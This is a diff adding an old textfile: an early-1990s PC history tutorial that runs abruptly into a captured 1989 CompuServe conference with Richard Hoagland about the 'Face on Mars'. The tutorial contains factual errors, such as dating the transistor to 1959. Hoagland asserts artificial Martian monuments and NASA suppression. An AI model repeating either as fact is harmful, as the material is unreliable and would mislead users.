00000000..f2ae84ba --- /dev/null +++ b/textfiles.com/computers/history.txt @@ -0,0 +1,299 @@ + + ---------------------------------------------------------------- + + A LITTLE PC HISTORY + WHERE WE'VE BEEN WITH NO IDEA WHERE WE'RE GOING! + + ---------------------------------------------------------------- + + In the beginning . . . + + Computing or calculating by machine began in the middle east + with the use of pegs or stones in trays or channels. The + Babylonians developed the idea of stone or bead counters into + the more modern abacus - modern in the sense that the abacus is + still in use today and in the hands of an experienced operator + can calculate results faster than a computer! + + The beauty of the abacus is its simplicity in construction and + operation. Inexpensive beads of stone or wood and a simple frame + make up the abacus and the uneducated could quickly be trained + in its use. + + In the 8th and 9th centuries we note the rise of the Arabic + numeral system which slowly spread through Europe and the then + civilized world. Although a superior calculating system, Arabic + numerals required the user to understand the more complicated + numerical theory associated with the system. + + By the early 1600's Napier (often associated with the + development of logarithms and their practical application) + introduced a series of rods which could be used for + multiplication - a crude slide rule system. + + Soon, ever more complicated "calculating engines" or primitive + mechanical computing devices appeared. One example is the + complex Pascaline invented by Blaise Pascal. + + By 1791 the stage was set. Babbage, an English mathematician and + inventor with the help of Ada Byron (daughter of lord Byron, the + famous poet) developed the ideas for two mechanical calculators + or "number engines." The Difference Engine was a device to solve + polynomial equations by the methods of differences. The + Analytical Engine (which was never built)) was designed as a + general computing device. Both were mechanical in concept using + gears, rods and cams to perform calculations. Unfortunately + neither machine was built since the tooling and machining + technology of the day was imprecise and could not construct the + accurate parts needed. + + However the models and planning of Babbage and Byron did lead to + important preliminary computing concepts still in use today. As + an aside, we should note from the work of Babbage and Byron that + computing even in its infancy was strongly influenced by BOTH + women and men - let's face it, computing is NOT gender specific! + + Next we jump to the United States. By 1880 a problem had arisen + with the United States census. By that time, it took 7 years to + process all of the information gathered by the Census Bureau + since all tabulation was done by hand on paper. It was assumed + that the 1890 census might take 10 to 12 years to tabulate. + Clearly a better method was needed to crunch the volume of + numbers and data. A public competition was held to produce a + better indexing or mechanical system to tabulate future census + results. Herman Hollerith, a census employee, handily won by + suggesting the use of punch cards and a form of punch card + reader which tabulated the results in six weeks. Hollerith, wise + in the ways of computing devices and seeing a good opportunity + went on to found the Tabulating Machine Company (later changed + to IBM). Hollerith might be thus thought of as our first + computer entrepreneur! + + The advent of World War II provided the impetus for the + development of more refined computing devices. The Mark I was an + electromechanical device using relays. IBM built that computer + for the Navy. Later, the Colossus was built for the British and + used for wartime code breaking of German radio transmissions. + The ABC (Atanasoff-Berry Computer) was constructed at Iowa State + and was the first fully electronic digital computer. + + Admiral Grace Hopper, known as "Amazing Grace" to some, was a + naval officer and pioneer in the field of computer programming + during the 1940's and 50's. An innovative and fundamental + thinker, she recognized that computers could be used for + business applications - a pioneering insight beyond the then + conventional use of computers for scientific and military + applications. Her programming language called "Flowmatic" later + evolved into COBOL, the most common and still popular language + for programming business software. She died in 1992 and is + buried in Arlington National Cemetery. + + Computing science continued to evolve rapidly . . . + + Eniac was the most famous of the early computers and contained + 18,000 vacuum tubes and was used by the Army for ballistics + calculations. + + Edvac was the first stored memory computing device which did + away with rewiring tasks associated with changing computer + programs and represented a true computer breakthrough. This + first generation of machines running from roughly 1951 through + 1958 featured computers characterized by the use of radio type + vacuum tubes. But the pace was increasing . . . + + Second generation machines such as the famous Univac were + designed as true general or universal purpose machines and could + process both alphabetic and numeric problems and data. Punch + cards still formed the major input path to the machines of this + era and all programming was done in complex low level machine + language commands. + + By 1959 with the invention of the transistor, computers began to + shrink in size and cost and operate faster and more dependably + than the huge vacuum tube models. Programming languages began to + feature English-like instructions rather than cumbersome machine + code or assembly language. Fortran and Cobol are two modern + "high level" languages developed during this period and still in + use today. + + In many respects, the personal computer industry began in 1974 + when the Intel corporation introduced a CPU integrated circuit + chip named the 8080. It contained 4,500 transistors and could + address 64K of memory through a 16 bit data bus. The 8080 was + the integrated circuit brain behind the early MITS Altair + personal computer which fired popular interest in home and small + business computing when it appeared on the July 1975 cover of + Popular Electronics Magazine. The first MITS Altair contained no + keyboard or monitor, only crude LED lights and tiny flip + switches to facilitate programming. + + Four years later in 1978 Intel released the 8086 chip which had + a tenfold increase in performance over the 8080 chip. When IBM + began the design phase of the first desktop PC units in 1980 and + 1981, they chose the cousin of the 8086, the Intel 8088 chip, to + power the first PC which was designed for modest corporate use + but quickly exploded in popularity due to an excellent design, + spectacular keyboard and openess to upgrade by the addition of + "plug in" boards and cards. + + Early IBM PC computers retained a link with the past by allowing + the addition of a small "Baby Blue" circuit board which could + run software programs based on the then dominant CPM operating + system. + + Finally we come to the present decade . . . + + August 1981. Original IBM PC (personal computer) introduced. Has + options for monochrome and CGA color display. Receives generally + good reviews and acceptance by business users and a few home + users. Original DOS version 1.0 released which supported only + single sided disks (160K capacity). Later version 1.1 corrected + bugs (problems) in the DOS programming code and provided double + sided disks (320K capacity), and faster disk access, date and + time stamping and better serial communications. + + August 1982. Monochrome resolution of PC screen increased with + introduction of the Hercules graphics card circuit. Combined + with the LOTUS 123 spreadsheet, the IBM PC was now a hot choice + for corporate computing. + + November 1982. Compaq portable arrives. First IBM clone on the + market. The IBM PC standard is growing in popularity. Clone + makers start to copy the PC in earnest. Software companies such + as Phoenix technologies prepare BIOS and SYS programs which run + the same as the IBM BIOS program without the copyright violation + which every clone computer tries to avoid. BIOS stands for basic + input and output system and is the core software essential to + keyboard, disk and screen input/output. The BIOS is considered + legally protected IBM software code, but can be simulated (or + emulated) closely by a clever programmer in an attempt to do the + same job, without using exactly the same programming code. + + March 1983. IBM introduces the PC XT (increased memory and hard + drive capability). DOS version 2.0 released. This second DOS + version includes hard drive capability, filter commands (sort, + find, more), and a new floppy format system for 360K capacity + per floppy. IBM bios code upgraded. + + October 1983. IBM PC JR released. Market disappointment for that + IBM entry into the home market with the underpowered PC JR. The + larger IBM PC standard is rapidly growing as the standard for + personal computers and clones. + + March 1984. IBM PC portable introduced. Portable clones already + on the market with small but growing success. + + August 1984. IBM PC AT machine arrives. More power, a new + processor (Intel 80286). New screen display standard (EGA). Also + new version of DOS 3.0. This version of DOS now takes into + account the AT high density floppy drive (1.2 meg or million + characters of capacity), read only files and a new disk write + system for better file recovery in case of errors. Shortly + thereafter, DOS 3.1 addresses file sharing. + + November 1985. Microsoft windows graphic display environment + released. NEC multisync monitor is released. + + December 1985. DOS 3.2 supports the new 3.5 inch 720K diskettes. + DOS now addresses up to 32MB on a single hard disk. + + April 1986. Older IBM PC standard model discontinued for newer + models. IBM PC convertible model is released. + + September 1986. Compaq jumps the gun on IBM with release of new + (80386) processor computer with more power than the PC AT. + + April 1987. IBM PS/2 models 30, 50 and 60 released. DOS 3.3 + released. VGA video standard arrives. IBM blesses the new 3.5 + inch minifloppy already in use on Apple Macintosh computers by + offering that format on IBM machines. 1.44MB format is supported + for high density floppy users. OS/2 operating system announced. + + August 1987. Microsoft windows version 2.0 arrives. + + November 1988. DOS 4.01 released which includes a shell menu + interface system. This release of DOS, largely developed by IBM, + generally ignored due to poor performance and large memory + requirements. Many users stick with DOS 3.3. + + 1988 Laptop computers, smaller versions of desktop computers, + are sold in large volumes. Size as well as features become + issues in computer sales. + + 1990 Microsoft introduces Windows version 3.0 which includes a + superb graphical user interface (GUI) display for the PC. + Improves on earlier versions of Windows. Using software is more + productive with multiple graphical software windows and the + possibility of jumping between several software tasks operating + on screen. But windows can only run acceptably on more expensive + "high end" machines such as those containing the 386DX or 386SX + chip. For many users in small offices or home offices, Windows + may not be a necessity where simple DOS applications offer + affordable functionality on low priced PC's not equipped to run + Windows applications. + + 1991 Laptop computers, portable FAX systems, and cellular + portable phone technology allow computers to function anywhere + on the go for a practical "portable office" concept. Still newer + "palmtop" computers about the size of portable calculators now + offer full IBM compatable functionality. + + June 1991. DOS 5.0 is released which includes excellent new + features including an improved menu interface, full-screen + editor which improves on the Edlin editor, some limited task- + swapping abilities, unformat/unerase utility, improved Basic + interpreter, and ability to load system files to High Memory on + machines having at least 1MB for improved performance and + increased conventional memory availability for primary applications. + DOS 5.0 is seen to be a major and highly necessary update to the + PC operating system. Generally receives good reviews from computer + trade press. + + The future? Difficult to predict, but the consensus of industry + observers is that the IBM PS/2 computers will migrate into the + office scene while many home and home/office users will stay + with older XT computers and AT models. Best entry level computer + system at this time is judged by many experts to the a 386SX PC + system which allows many types of software both current and + future to work reliably. Prices continue to tumble on AT and XT + compatibles ($400 to $500 range) and AT clones ($700 to + $900 range). The operating system for AT and higher class machines + (using 80286/80386 processors) is called OS/2 but requires more + memory and the 80286/80386 processor found only in higher + priced computers. OS/2 or Windows may slowly replace the older + DOS system, but for many users of home and home/office machines + not needing LAN networks (many computers talk to each other and + share data), the DOS standard will live a long time. The Microsoft + Windows 3.0 system may delay the acceptance of OS/2 for several + years. + + In general expect things to happen faster, computers to become + still smaller and prices to descend still further! Graphical + user interfaces or GUI's will gradually become the standard so + that users can point and click at small icon pictures and lists + of tasks on screen to accomplish the work at hand rather than + fight with terse and cryptic commands. Computing will become a + standard in many small and home offices owing to the incredible + power, accuracy and affordablity of personal computers. Laptop + computers and even smaller palmtop computers will become new + standards. Computers and modems linked by wireless cellular + radio/telephone technology allow a single computer user the + power of "large office computing" on the go from anywhere in the + world! Shareware software will make strong inroads into the + market as users evaluate commercial "high priced" software + against user support "low cost" shareware software. + + Tutorial finished. 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It is very important that this issue + receive the proper amount of "political" attention, as NASA seems to have + their own agenda on how to look for signs of extrasolar intelligence AND + has refused to consider any "outside" evidence, irregardless of how + compelling. + + + + +Press for next or type CHOICES ! + + +[76012,3361] +HOAG.CO 11-May-89 36058 Accesses: 39 + + Keywords: HOAGLAND MARS MISSIOM PROJECT CO ET FACE + + This file is transcript of Sunday, May 7, 1989 on-line CompuServe + Conference sponsored by the National Issues and People Forum with author + Richard Hoagland. His most recent book, "The Monuments of Mars," explores +a + surface anomaly photographed by NASA's Mars Viking Mission resembling a + human face. + + + + +Press for next or type CHOICES !CHO + +The Issues Forum Library Disposition + + + 1 READ this file + 2 DOWNLOAD this file + 3 RETURN to library menu + + +Enter choice or for next !1 + + +[The following is a transcript of Sunday, May 7, 1989 on-line CompuServe +Conference sponsored by the National Issues and People Forum with author Rich +ard +Hoagland. His most recent book, "The Monuments of Mars," explores a surface +anomaly photographed by NASA's Mars Viking Mission resembling a human face.] + + User ID Nod Name + ------------- --- ------------------- + 72470,250 NRL daniel burton + 71340,276 SOR Mark.Y + 76012,3361 MRT Ted + 76340,3357 BTM Michelle Smith + 76703,266 DUK Georgia + 71270,1311 LAK MARTIN ARANT + 76416,733 QFM Ed Tarantelli + 76702,330 CWV Dick + 72537,2312 PRI Paul Carr + 74656,2333 LCA Paul J. Burke/CA + 71435,1203 NWH Howard + 72135,424 PNX Jim S. + 73500,625 CGK John + 72406,1736 HLY Darrell Green + 70511,17 CRZ Mike + 74270,3360 BOI Don Ecker + 71450,3504 ANN Bert + 72560,341 RIV Mike Sugarman/Celes + 72427,1316 ENC Ron Page + 76703,674 DUK Chuck Lynd + 76247,447 DTB steve rivera + 72470,242 HVN EROL TORUN + 75015,364 SFM Stan Tenen + 72210,1213 DEM mcorbin + 76703,303 WVA Dick DeLoach + +% Conference has begun + +(Georgia) Welcome to all! Tonight we welcome Richard Hoagland. During the +question-and-answer period, when it is your turn to speak, please keep line +length to around 60 columns. Keep questions short so that all participants h +ave +an opportunity to ask their questions. When you have finished formulating yo +ur +question, end with GA so that our guest will know when to begin. First, Ted +Markley, my assistant in charge of Paranormal issues will introduce the guest +, +then ask some questions to start things moving. After that we will take +questions as long as possible. GA Ted. + +(Ted) Tonight we are fortunate to have as our special guest Richard Hoagland +, +author of "The Monuments of Mars" and founder of the Mars Project and the new +ly +formed Mars Mission. Dick's long list of impressive credentials can found in +the +Convention Center lobby as well as in the Issues Forum. Before we open the fl +oor +to questions I will conduct a brief interview with Dick which will cover some +of +the more frequently asked question. Welcome, Dick! GA + +(Dick) Thanks, Ted. It's nice to be here. Ah, where ever "here" is. + +(Ted) While many here tonight have read your book, others only know of the +"Face" on the Martian surface through tabloids such as the "National Enquirer +." +I know that this Martian surface feature is getting the serious attention of +noted members of the scientific community. Can you comment on the caliber of +the +team on the Mars Project. GA + +(Dick) Well, Ted, the list is constantly growing. We have some whom have been +involved almost from the beginning -like Dr. Mark Carlotto, of the Analytic +Science Corporation, in Reading Mass. But, then we have "new blood" that com +es +to us out of the blue, like Erol Torun of Defense Mapping who read my book la +st +okfall, was _determined_ to prove me wrong -- and wound up discovering some +extraordinary stuff. So it just keeps growing.GA +{ +(Ted) Dick, you recently started the Mars Mission as spin off of the Mars +Project. Can you explain the charter and purpose of the Mars Mission? GA + +(Dick) When it became clear last Fall that we were really on to something, w +hen +the numbers started really coming together I realized that the biggest hurdle +to +getting verification was going to be the _political_ process. So, if the +Project was the originator of the research, the Mars Mission is the "home" of +what I like to think of as the necessary "democratization" of the data to get +the _political_ system up to speed for verification. In other words, we need +to +put the pressure on NASA to TAKE NEW PICTURES. And that means Congress and +people who want to know if this is real.ga + +(Ted) Is there a way that interested people (even though they may not be high +ly +technical) can keep abreast of new development in both the Mars Project and t +he +Mars Mission? ----- Dick got knocked off. Please stand by. For those of you w +ho +just joined us, Dick Hoagland was knocked off and should be back on shortly. +ga + +(Dick H.) Sorry, guys I seem to have slipped into a warp. This ship takes a +little getting used to. One can't be "all thumbs".ga + +(Ted) I'll repeat my last question. Is there a way that interested people (e +ven +though they may not be highly technical) can keep abreast of new development +in +both the Mars Project and the Mars Mission? GA + +(Dick H.) Let's try again. Yes, there is. One can write to us at the Mars +Mission: P.O. Box 981, Wytheville, VA 24382. Or, one can subscribe to the Ma +rs +Mission Newsletter (at the same P.O. Box). Or, one can actually log-on to ou +r +new (very new -- grin) Mars Mission Board, which we hope to get up and runnin +g +in a week or two. There are so many new developments -- on both the research +front and the political front that we've decided to try the "electronic way" +and +see if it works. I should add that Marty Arant is the guy who really impelled +us +to try this, so if it DOESN'T work blame him!.ga + +(Ted) One last ? before I open the floor. What can the average person do to +help get us back to Mars and get more data on the "Face"? GA + +(Dick H.) (Sorry for the delay -- we have cats) The main thing is that we nee +d +new images of Cydonia, ASAP, And NASA has steadfastly refused to take them!! +! +That simply doesn't make sense. What makes this science, as opposed to that +"other stuff" is that THIS IS TESTABLE. It's that simple. The fact that NASA +doesn't WANT to subject this data to the only fair appraisal at this point, i +s +very suspicious. Which is why we were extremely gratified that we've found su +ch +an excellent reception on Capitol Hill including an invitation to meet with t +he +Chairman (himself!) of the House Committee on Science, Space and Technology a +couple of weeks ago. His attention to this problem is probably going to do m +ore +in the long run to get us the answers we need (and deserve) than any other +single development on the political front in the last 13 years. And, to keep +that side of the system "honest" public interest (citizen support for the sim +ple +idea of LOOKING) is ESSENTIAL. This, Congressman Robert A. Roe should get som +e +mail from anyone who wants to let him know that they support HIS interest in +this vital inquiry. His address is: + + The Honorable Robert A. Roe + Chairman, House Committee on Space, Science and Technology + U.S. House of Representatives + Rayburn Building -- Rm 2243 + Washington, D.C. + +Ted, you asked.ga + +(Ted) I'll now open the floor to ? GA + +(Dick H.) Sounds good.ga + +(Georgia) type /que to get in line. + +% Moderator recognizes queue #1 + Paul J. Burke/CA <10> + +(Paul J. Burke/CA) Mr. Hoagland, I feel you are mining the depths of scientif +ic +ignorance, with this phony issue. It is the nadir of anthroprocentric chauvan +ism +to believe some advanced civilization could detect the existence of man on th +is +planet and do nothing more than carve out a mountain that MIGHT be seen, by s +ome +tree dwelling mammal. How could THEY see so far ahead? GA. + +(Dick H.) This goes to the heart of many issues, Paul I personally believe it +is +us who are acting slightly anthropocentric. We have an "image," a "model" fo +r +how "ET" is "supposed" to behave. If the "signal" we get doesn't fit that +"image," we -- NASA -- rejects it. So, which is more anthropocentric? To pur +sue +data where it leads. Or to say, "the data doesn't exist?"ga + +(Paul J. Burke/CA) Aren't the Mars imagers dead? How can NASA take any more +photos? + +(Dick H.) I don't see any connection. The material "ruins" are still there. +When Mars Observer gets there in 1993, all we want is the Cydonia Region +REIMAGED. The objects (there is FAR more than the "face") will still certain +ly +be there.ga + +(Ted) Next + +(Paul J. Burke/CA) I would agree to a 'side trip' on the next Mars mission, + +(Dick H.) It's not even that complicated. Mars Observer will be in a POLAR +ORBIT. It will inevitably fly over EVERY SQUARE INCH OF MARS every 35 or 36 +days. So, all NASA has to agree to is to take the images at the designated ti +me. +And they won't!ga + +% Moderator recognizes queue #2 + Bert <17> + +(Ted) GA Bert + +(Bert) Dick, do you know if the Soviets have an interest in Cydonia and do yo +u +have any information relating to the AP release (a month or so back) indicati +ng +the Soviets had observed something very strange on the surface of Mars? GA + +(Dick H.) I put several items relating to the past research history of this i +nto +the Library earlier today (Ted, can tell you guys how to get them out!) I can +tell you this (as background to some of that material, which relates to past +dealings we've had with the Soviets on this issue. Last January, one of our t +eam +-- Dr. Brian O'Leary a former scientist-astronaut went personally to Moscow w +ith +the pictures. His mission: to try to get Sagdeev and others to take new image +s +with the Phobos spacecraft. They all sat there, looking at the Carlotto +enhancements and were VERY interested, according to O'leary. That was over a +year ago. Late last year, in December, just before the NASA briefing we did I +got a letter from a Soviet scientist whom we've been in direct contact with f +or +about a year. He's a specialist in "problems of extraterrestrial contact". +His +Ph.D. is in this particular subject, in fact! Anyway, HE said the new data wa +s +SO interesting, he was going to Sagdeev (then head of the unmanned Phobos +Mission) to try to get new images of Cydonia from Phobos 2. That was last +December I, of course, immediately shot back a reply telling him HOW the imag +es +might be taken (inclination of orbit to the equator, etc.) So far -- this is +MAY -- nothing. But the Soviet's HAVE announced some pretty peculiar things +around their Phobos mission including a Radio Moscow Report that Marty Arant +heard first-hand which had Orthodox Russian priests going into the Moscow Pho +bos +Control Center to "see the Phobos images of Mars and to talk about the creati +on. +You figure it out.ga. + +(Ted) As Dick mentioned, there will be several files in LIB 10 of the ISSUES +forum tomorrow. Dick was furiously uploading document today and I have not +processed them all yet.... + +(Dick H.) "Furiously" is right.ga + +(Ted) We will have only one ? each until all have had at least one chance. G +A +NEXT + +% Moderator recognizes queue #3 + DON <16> + +(#DON) Ok Thanks Ted. Richard, I have just a simple question. I am presuming +that the majority of your work is concerned with the photos that were taken i +n +the early 70's, and are mostly concerned with the "face" and what you perceiv +e +as structures my question is this. How many independent computer photo +enhancements have been performed by independent facilities, other than the +Carlotto work and if this is so important why is there so much "infighting" +among the various people working on this, such as John Brandenbergs Cydonia +Features, and Vince Di Pietro and Greg Molenaar. Why is there no co-operatio +n? +ga + +(Dick H.) I guess every time in the history of human affairs one comes up +against a problem that is really interesting very "human" problem will +inevitably raise there head. This is true, whether you work at the NSC, at NA +SA, +for the Civil Rights movement, or anything. The fact of the matter is we all +, +all of us who have been involved with this firmly are committed to one goal n +ow: +new images ASAP. That's got to be priority number uno. The rest of it -- whi +ch +says a lot about different emphasis on different aspects of the research is f +ar +less important than that point.ga + +(DON) Ok, so how many independent research efforts have there been that confi +rms +your theory? Or is there only one? ga + +(Dick H.) Good question. In "Monuments" I go into great detail on three +investigations. Each of these did some imaging. The first, of course, was +NASA! Surprised? It as NASA which first "found" this object, and put it on th +e +public record. It was only after that, that others namely DiPietro and +Molenarr, at Goddard, in 1979 did their "thing" -- found the SECOND, +corroborating frames taken of Cydonia at a higher sun-angle which has given u +s +such great data to actually work with. They did enhancements, published and +nothing much happened for EIGHT YEARS. Then, in 1983 I got the images, looked +at +them and realized that I was seeing not only a "face" but other things which +didn't belong there. That's when the third IMAGING investigation began -- at +SRI. Their Prime system did some excellent work, using digital copies of the +NASA Viking tapes. That's when we turned to a FOURTH source, for "independen +t +data" on the imaging: Mark Carlotto. Carlotto, I must say, has put the most +time and effort into extracting every bit of data from these tapes. And he's +brought not only new techniques to the imaging. He's also "attacked" the prob +lem +with new ideas -- such as the "fractal analysis" he's not done and submitted +to +the journals. And every time we use a new technique we turn up DATA not noi +se. +That, I believe, is trying to tell us something.ga + +% Moderator recognizes queue #4 + Stan Tenen <8> + +(Stan Tenen) hi, Richard, this is Stan of meru. (I don't think I can squeeze +in +punctuation ). I have several questions; first, i think that you are focusin +g +on the wrong data; brilliant as Carlotto's analysis is, the best data , in my +opinion is Toruns. the alignments that he shows among the various strange +objects at Cydonia is very hard to explain for example: l the edges of the d& +m +pyramid are very fuzzy in the enhanced photos. I am not convinced by the phot +os +what is extraordinary is that the alignments of the d&m with the bulls eye an +d +the face and the cliff and the tholus are exactly redefine the fuzzy edges of +the d & m so it is not necessary to see it clearly - the alignments sharply +define the edges. Also, it is not hard to find very interesting alignments f +or +example; the cliff subtends the same angle from both the tip of the d & m and +from the city center bulls eye. That means that the edges of the cliff, which +are very well defined and the tip of the d & m and the bulls eye must lie on +the +same circle. By the way, what features has John Brandenberg found - I have n +ot +heard of his data before. Also, you mentioned base 3 and 3609 on the phone +earlier my calculations show 360 base 10 to equal 111100 base 3. 364 base 1 +retry; 364 base 10 equals 111111 base 3, much more elegant. What say you. ga + +(Dick H.) I don't know quite where to begin, Stan. Let me say, first, that yo +u +have confused some of the work just a bit. When I got into this, back in 198 +3, +it was precisely because I thought I saw the potential for some remarkable +relationships between some intriguing objects at Cydonia. I put these ideas +into a VERY primitive numerical "model" in "Monuments" I called it the +"relationship model" and felt that if we were going to ever know at EXISTING +image resolution what we were dealing with it would only be through discovery +of +some very precise, provocative, and repeating numerical RELATIONSHIPS between +these objects. Little did I know that that day would arrive much sooner than +I +thought when I finished the book Erol, in the Fall of last year, in measuring +. +ONE of the most fascinating "structures" near the "face": the so-called "D&M +Pyramid" discovered an extraordinary set of VERY SPECIFIC relationships INTER +NAL +to this object. I, in turn, in remeasuring all the previous alignments, had +noted in the book between the objects that you cited -- the Face, the "City", +the "Cliff" and the "Tholus" (all objects which are much easier to talk about +if +you have images and maps before you!) Anyway, in remeasuring those previousl +y +noted alignments, I discovered to my immense surprise -- and satisfaction! -- +that Torun's precise numerical angles (and derived numerical constants which +we +shall define in a moment) SHOWED UP -- not once . . . or twice . . . but perh +aps +HALF A DOZEN TIMES (I've lost exact count, at this point). The point is this +: +you're right. To me, the REALLY exciting stuff is NOT that something "looks +like a face" or "looks like a Pyramid". It's that Erol and I have discovered +between us something like two or three dozen REPEATING numerical relationship +s +and these have given us the SAME set of repeating mathematical constants -- l +ike +"e" and "pi" -- again . . . and again . . . and again. And these constants +have now yielded a prediction as to the very siting latitude of these objects +on +the planets's surface --. Anyway, you're right. THAT's the "ball to keep +one's eye upon! And, tonight, we're fortunate that Erol is here, to tell us +specifically what he's discovered recently.ga + +(Georgia) Ted is next. + +(Ted) Dick, I think we passed too quickly over a couple of innuendoes that Do +n +raised relative to "Infighting" and lack of co-operation among members of the +Mars Project. Is it true that this has been occurring? GA + +(Dick H.) I'd be less than candid if I didn't say, "yes." But so what? Polit +ics +are everywhere. The point is not who agrees with you, or who decides that "th +is" +area is more important than "that." The point in science is "Can you test yo +ur +hypothesis?" Personality conflicts, hidden agendas, fear of being too bold ( +or +too timid) have no real place in such a process. That's why those of us who +think we need a bold, politically aggressive strategy to get back to Mars for +the crucial data that we need now have frmed the Mars Mission. That doesn't + +(Ted) GA Dick + +(Ted) Dick has been knocked off again. + +(Dick H.) Gone into the ether, again. But, I'm back! + +% Moderator recognizes queue #5 + steve rivera <22> + +(Ted) TO get into QUE type "/que" GA Dick + +(Dick H.) Now, what was I saying? Oh, yes . . . the point is not the politics +of +"personality," but the objective of getting real information on a problem of +first-rate importance. If the criteria for an important problem be that there +are no "politics," then that would eliminate ALL of human activity. Next.ga + +(Ted) GA Steve + +(steve rivera) SORRY I MISSED THE FIRST FIFTEEN MINUTES OF THE CONFERENCE +BESIDES THE "ISSUES" FORUM, WHERE CAN I GET MORE INFORMATION (AND PERHAPS +PHOTOS) SUCH AS BBS NUMBERS, ADDRESSES, ETC DTB GA + +(Ted) Steve, there will be a transcript of this CO in the ISSUES Lib 10 soon. +Dick answered that question earlier. If you don't find what you need there se +nd +me EMAIL. NEXT + +% Moderator recognizes queue #6 + Jim S. <12> + +(Dick H.) I should add our Mars BBS number, however, which I forgot earlier +(703)228-7822.ga + +(Jim S.) I should preface by saying the face looks enough like a face to me t +o +merit serious inquiry, however. As you know, this issue lives or dies on +scientific diligence. In your white paper, you refer to the Viking images as +the +"first hard evidence" of the existence of ETI. Was this just a semantical sli +p +(did you mean "possible indication") or do you really consider your findings +"hard evidence"? If so, isn't it possible that NASA's motivation (or lack +thereof) stems from simple mistrust of your methodology and/or scientific +objectivity? GA + +(Dick H.) Excellent question. I used the term "hard" because for all of NASA' +s +30 years of SETI. They've only had THEORY. The evidence in the images -- no +matter how you consider the pros or cons of looking at it -- is hard evidence +. +It must be addressed. It has not been except by this group OUTSIDE of NASA. +I +have entered in LIB 10 what I think as some of the reasons for this. You may +agree or disagree. But the point is this. In science, when a theory +("Hypothesis" is a better term, here) is "on the table," the scientific proce +ss +DEMANDS that it be tested. It hasn't been. The only one's who can TEST it a +t +this point on Mars (which is the only test that will really convince everyone +) +are the NASA folks who control the spacecraft, the launch facilities, the +imaging systems the tracking network, etc.etc.etc. And that"s put a severe +"dent" in the process.ga + +(Ted) Next + +% Moderator recognizes queue #7 + Bert <17> + +(Ted) Bert Passes, Next + +% Moderator recognizes queue #8 + mcorbin <9> + +(mcorbin) Dick, I hope that this is not redundant as I was unable to get on a +t +6:30 due to network problems, but despite official NASA denial of interest in +this aspect of the Martian surface are there any indications of interest on +their part unofficially? I seem to get the indication that they do indeed ha +ve +an interest in this phenomenon, but they are not public about it.ga + +(Dick H.) If they don't have a "official"interest now, they might have shortl +y. +Tomorrow morning, according to a phone conversation we had with the chief aid +to +Congressman Roe last Friday the Congressman is sending an _official_letter to +NASA, asking precisely that question "WHAT (NASA) HAVE YOU DONE ABOUT THIS +DATA?" Now it's become a bit uncomfortable in the last 48 hours or so to lie +to +Congress. I think we're going to find out some interesting things in the next +few days.ga + +(Ted) Ok Next + +% Moderator recognizes queue #9 + DON <16> + +(DON) Richard, I assume you are familiar with William "Bill" Moore and the wo +rk +that he, Stan Friedman and Jamie Shandera have done with the MJ-12 material. +As +you may or may not know, ParaNet was the first informational system to "break +" +this story, at ParaNet and here on CIS. I understand that Moore was attemptin +g +to get in contact with you. Would you care to elaborate on this, and does it +have anything to do with your attempt to get Congress involved with the Mars +material and his same attempt in reference with the MJ-12 material? ga + +(Dick H.) First, the investigation into the Viking images has no DIRECT +connection with any UFO material, investigations, etc. I want to say that, so +that what I say next is very clear. Both, however, have at their root, a +POLITICAL problem. If NASA HAS done work on these images (in the theory that +we're not the only "smart" guys in town) then the ONLY way to find that out i +s +through the political process -- if it works. The UFO guys have had the same +problem. So, on the surface there is a similarity. The DIFFERENCE is this: w +e +can test the Mars data in the very near future BY SIMPLY GETTING NEW IMAGES O +F +MARS. There is no easy way to TEST the UFO hypothesis; the "data" doesn't +"stand still". Now, I'm impressed that the CHAIRMAN of the most powerful +committee, in terms of science, in the Congress invited us in HIMSELF -- no +"staff" etc. We had what Henry Kissinger would have called a "frank and open +discussion" of many issues. His reaction was (and I'm paraphrasing here, of +course): "Look, NASA's taken a _political_ position why are you here . . . fo +r a +_political_ solution." But, that solution is going to need the attention of +Americans who want to know what's there, if these political expressions of +interest are going to be followed through.ga + +(Georgia) We are not quite finished but the format is about to change there a +re +still 3 questions and after I end the formal session, each of you 3 send a ? +and +Ted will moderate there is a more manageable number here now. I want to thank +Richard!!! APPLAUSE!! + +% The conference has ended + Thank you for attending + +(Jim S.) ? + +(Ted) Let start the new que, who are waiting in the wings? ga + +(DON) !! +(MARTIN ARANT) ? +(mcorbin) ! +(Stan Tenen) ? + +(Ted) GA Jim + +(Jim S.) Thanks Ted, and yes, applause Dick. Is it just coincidence that your +Mars Mission is headquartered in a well-known UFO flap area? More to the poin +t, +is Danny Gordon in any way connected with your group? GA + +(Dick H.) Well, everyone I know, at one time or another has asked me that in +the +last year! I can assure you that UFO's are NOT why I'm here. But I have met +Danny Gordon on a number of occasions. And he strikes me as a serious reporte +r, +trying to fathom an unfathomable story.ga + +(Ted) Don is next ga + +(DON) Richard, lets get back to Moore. I believe you did not address the +question about Moore? Is he connected with you with the Mars material, or wa +s +this coincidence? ga + +(Dick H.) Don, I have also met Bill Moore -- at a coupe of conferences in LA, +I +believe. (So, I don't know where the idea came from that "he's trying to get +in +touch with me; he already has!") Anyway, I know all about his work, and can +assure you that it has no direct or indirect connection with our own. Let me +add +this, however. If this data we've been exploring on Mars is as robust as it h +as +now become to some of us, then it raises the obvious question: if someone cou +ld +find this solar system once (the operative "visitor to Mars" model that I +favor). Then why couldn't someone AGAIN. Especially, if the "face" is trying +to +tell us of some "link" with events beyond this planet. I think we should all +keep an open mind on that point.ga + +(Ted) Martin is next Don you are in line after Stan ga Martin + +(#MARTIN ARANT) on my interesting conversation with JPL ted, am I on? OK. Dic +k, +Great conference! I was #11 and was going to make a statement on my interesti +ng +conversation with the "gentleman" at JPL. Anyway, is Erol Torom on line? I a +m +interested in what else he has discovered. ga + +(Dick H.) Erol, do you want to get a word in here?ga + +(Ted) Ga Erol + +(Bert) ? + +(Ted) Maybe Erol will speak later + +(Dick H.) Let me answer Marty's question in another way. Marty called JPL som +e +weeks ago and got some very interesting responses to this investigation. +Particularly the idea that if we "keep this up, we're going to destroy the +planetary program, if not at least Mars Observer!" I kid you not... Anyway, l +ast +week, a reporter for the Wall St. Journal called up JPL and, asked to speak t +o +the Project Scientist for Mars Observer. I think his name is Alby, or +something. Anyway, Alby told the Wall St. Journal guy that "he didn't have an +y +objection to taking a few pictures of Cydonia if asked. Point: this represen +ts +a 180 degree reversal of field for NASA. And, I said in a note to the Journa +l +reporter: "Perhaps it's because there have been some calls from the guys on t +he +Hill in the last few days"ga + +(Ted) Ok Mike wanna continue? ga + +(mcorbin) Yield to Bert. Th-.,.HX6l. Good night. +{ +(Ted) Stan is next GA STAN + 